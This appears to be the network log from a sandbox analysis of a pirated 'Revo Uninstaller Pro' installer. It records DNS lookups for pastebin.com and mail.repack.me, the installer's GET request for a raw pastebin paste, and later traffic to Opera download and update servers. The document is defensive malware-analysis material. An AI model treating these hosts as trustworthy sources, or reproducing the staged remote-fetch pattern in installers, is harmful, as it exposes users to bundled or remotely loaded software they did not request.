                                                                                                                                                                          Dec 9, 2024 17:54:05.982592106 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.982592106 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.982598066 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.982763052 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.129173994 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.129200935 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.129300117 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.129321098 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.129357100 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.129431009 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.135236979 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.135256052 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.135337114 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.135343075 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.135601997 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.141974926 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.141992092 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.142188072 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.142193079 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.142230034 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148070097 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.148130894 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.148154974 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.148155928 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148178101 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148200989 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148319006 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148330927 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.621921062 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:10.621992111 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.622066975 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:10.628257036 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:10.628315926 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.628362894 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:10.660134077 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:10.660161018 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.660347939 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:10.660371065 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.224936008 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:11.224999905 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.225061893 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:11.227109909 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:11.227123976 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.915776968 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.915946960 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:11.916114092 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.916342974 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:11.988487959 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:11.988496065 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:11.988527060 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.988540888 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.988895893 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.988910913 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.988997936 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:11.989029884 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:11.991153002 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:11.993455887 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:12.035324097 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.035332918 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.359565020 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.359649897 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.359673023 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:12.359916925 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:12.365382910 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:12.365403891 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.390427113 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.390491009 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:12.390516996 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.390579939 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.390631914 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:12.711154938 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:12.711195946 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.824083090 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.824160099 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.174374104 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.174408913 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.174860001 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.174921036 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.175337076 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.175426960 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.175431967 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.311644077 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:13.311714888 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.311835051 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:13.312406063 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:13.312424898 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.613828897 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:13.613878965 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.613953114 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:13.614346981 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:13.614362955 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626647949 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626701117 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626713037 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626723051 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626744032 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626766920 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626866102 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626879930 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626889944 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626923084 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.628355026 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.628400087 CET44349859107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.628448963 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.628998041 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.629009008 CET44349859107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.550559998 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.550683975 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:14.554483891 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:14.554501057 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.554776907 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.554927111 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:14.555212021 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:14.595323086 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.852835894 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.855663061 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:14.861326933 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:14.861346960 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.861689091 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.863924980 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:14.864264011 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:14.911330938 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.992419958 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.992444038 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.992508888 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:14.992523909 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:14.992523909 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:14.992633104 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:14.993881941 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:14.993904114 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.202230930 CET44349859107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.202310085 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.202997923 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.203013897 CET44349859107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.203133106 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.203136921 CET44349859107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.322206974 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.322284937 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.322592974 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:15.324316978 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:15.324337959 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.654427052 CET44349859107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.654489994 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.654498100 CET44349859107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.654540062 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.654691935 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.654723883 CET44349859107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.654736996 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.654818058 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.655674934 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.655721903 CET44349866107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.655812025 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.656073093 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:15.656091928 CET44349866107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:17.225080013 CET44349866107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:17.225136995 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.228199005 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.228212118 CET44349866107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:17.228375912 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.228380919 CET44349866107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:17.687217951 CET44349866107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:17.687303066 CET44349866107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:17.687333107 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.687349081 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.689980030 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.690007925 CET44349866107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:17.690016985 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.693803072 CET49866443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.698635101 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.698684931 CET44349872107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:17.698967934 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.702810049 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:17.702824116 CET44349872107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:19.270729065 CET44349872107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:19.270787954 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:19.271301985 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:19.271307945 CET44349872107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:19.271495104 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:19.271498919 CET44349872107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:19.725940943 CET44349872107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:19.726001024 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:19.726011038 CET44349872107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:19.726028919 CET44349872107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:19.726052999 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:19.726083040 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:19.726193905 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:19.726211071 CET44349872107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:19.726237059 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:19.726347923 CET49872443192.168.2.4107.167.125.189
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Dec 9, 2024 17:53:09.808886051 CET6318453192.168.2.41.1.1.1
                                                                                                                                                                          Dec 9, 2024 17:53:09.946621895 CET53631841.1.1.1192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:53:12.066143036 CET6008353192.168.2.41.1.1.1
                                                                                                                                                                          Dec 9, 2024 17:53:12.211512089 CET53600831.1.1.1192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:00.094238043 CET6536553192.168.2.41.1.1.1
                                                                                                                                                                          Dec 9, 2024 17:54:00.652529001 CET53653651.1.1.1192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.478161097 CET6498753192.168.2.41.1.1.1
                                                                                                                                                                          Dec 9, 2024 17:54:10.478355885 CET5438353192.168.2.41.1.1.1
                                                                                                                                                                          Dec 9, 2024 17:54:10.484880924 CET6432453192.168.2.41.1.1.1
                                                                                                                                                                          Dec 9, 2024 17:54:10.616790056 CET53649871.1.1.1192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.626662970 CET53643241.1.1.1192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.222439051 CET53543831.1.1.1192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.172888994 CET4945353192.168.2.41.1.1.1
                                                                                                                                                                          Dec 9, 2024 17:54:13.177752018 CET5531753192.168.2.41.1.1.1
                                                                                                                                                                          Dec 9, 2024 17:54:13.310333014 CET53494531.1.1.1192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.612904072 CET53553171.1.1.1192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.327919006 CET5375053192.168.2.41.1.1.1
                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Dec 9, 2024 17:53:09.808886051 CET192.168.2.41.1.1.10xe2a7Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:53:12.066143036 CET192.168.2.41.1.1.10xe681Standard query (0)mail.repack.meA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:00.094238043 CET192.168.2.41.1.1.10xd202Standard query (0)net.geo.opera.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.478161097 CET192.168.2.41.1.1.10xe527Standard query (0)autoupdate.geo.opera.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.478355885 CET192.168.2.41.1.1.10xe2e5Standard query (0)desktop-netinstaller-sub.osp.opera.softwareA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.484880924 CET192.168.2.41.1.1.10xe362Standard query (0)autoupdate.opera.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.172888994 CET192.168.2.41.1.1.10x6b93Standard query (0)features.opera-api2.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.177752018 CET192.168.2.41.1.1.10xf0f9Standard query (0)download.opera.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:15.327919006 CET192.168.2.41.1.1.10x71dfStandard query (0)download3.operacdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Dec 9, 2024 17:53:09.946621895 CET1.1.1.1192.168.2.40xe2a7No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:53:09.946621895 CET1.1.1.1192.168.2.40xe2a7No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:53:09.946621895 CET1.1.1.1192.168.2.40xe2a7No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:53:12.211512089 CET1.1.1.1192.168.2.40xe681No error (0)mail.repack.me194.87.189.43A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:00.652529001 CET1.1.1.1192.168.2.40xd202No error (0)net.geo.opera.comna.net.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:00.652529001 CET1.1.1.1192.168.2.40xd202No error (0)na.net.opera.comtrn.lb.opera.technologyCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:00.652529001 CET1.1.1.1192.168.2.40xd202No error (0)trn.lb.opera.technology107.167.96.30A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:00.652529001 CET1.1.1.1192.168.2.40xd202No error (0)trn.lb.opera.technology107.167.96.31A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.616790056 CET1.1.1.1192.168.2.40xe527No error (0)autoupdate.geo.opera.comna-autoupdate.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.616790056 CET1.1.1.1192.168.2.40xe527No error (0)na-autoupdate.opera.com107.167.96.38A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.616790056 CET1.1.1.1192.168.2.40xe527No error (0)na-autoupdate.opera.com107.167.96.39A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.626662970 CET1.1.1.1192.168.2.40xe362No error (0)autoupdate.opera.comautoupdate.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.626662970 CET1.1.1.1192.168.2.40xe362No error (0)autoupdate.geo.opera.comna-autoupdate.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.626662970 CET1.1.1.1192.168.2.40xe362No error (0)na-autoupdate.opera.com107.167.96.39A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:10.626662970 CET1.1.1.1192.168.2.40xe362No error (0)na-autoupdate.opera.com107.167.96.38A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:11.222439051 CET1.1.1.1192.168.2.40xe2e5No error (0)desktop-netinstaller-sub.osp.opera.softwaresubmit-target.osp.opera.softwareCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:11.222439051 CET1.1.1.1192.168.2.40xe2e5No error (0)submit-target.osp.opera.softwaresubmit.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:11.222439051 CET1.1.1.1192.168.2.40xe2e5No error (0)submit.geo.opera.comsubmit-trn.osp.opera.softwareCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:11.222439051 CET1.1.1.1192.168.2.40xe2e5No error (0)submit-trn.osp.opera.software107.167.125.189A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.310333014 CET1.1.1.1192.168.2.40x6b93No error (0)features.opera-api2.comfeatures-2.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.310333014 CET1.1.1.1192.168.2.40x6b93No error (0)features-2.geo.opera.comca-features.opera-api2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.310333014 CET1.1.1.1192.168.2.40x6b93No error (0)ca-features.opera-api2.comtrn.lb.opera.technologyCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.310333014 CET1.1.1.1192.168.2.40x6b93No error (0)trn.lb.opera.technology107.167.96.30A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.310333014 CET1.1.1.1192.168.2.40x6b93No error (0)trn.lb.opera.technology107.167.96.31A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.612904072 CET1.1.1.1192.168.2.40xf0f9No error (0)download.opera.comdownload.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.612904072 CET1.1.1.1192.168.2.40xf0f9No error (0)download.geo.opera.comna-download.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.612904072 CET1.1.1.1192.168.2.40xf0f9No error (0)na-download.opera.com107.167.96.36A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:13.612904072 CET1.1.1.1192.168.2.40xf0f9No error (0)na-download.opera.com107.167.96.37A (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 9, 2024 17:54:15.465362072 CET1.1.1.1192.168.2.40x71dfNo error (0)download3.operacdn.comv2.download3.operacdn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          • pastebin.com
                                                                                                                                                                          • mail.repack.me
                                                                                                                                                                          • net.geo.opera.com
                                                                                                                                                                          • autoupdate.geo.opera.com
                                                                                                                                                                          • autoupdate.opera.com
                                                                                                                                                                          • desktop-netinstaller-sub.osp.opera.software
                                                                                                                                                                          • features.opera-api2.com
                                                                                                                                                                          • download.opera.com
                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.449736104.20.3.2354437324C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:53:11 UTC133OUTGET /raw/vkwZzU9B HTTP/1.1
                                                                                                                                                                          User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                                                          Host: pastebin.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:53:11 UTC397INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:53:11 GMT
                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          x-frame-options: DENY
                                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                                          x-xss-protection: 1;mode=block
                                                                                                                                                                          cache-control: public, max-age=1801
                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                          Age: 818
                                                                                                                                                                          Last-Modified: Mon, 09 Dec 2024 16:39:33 GMT
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ef6828cbafe439c-EWR
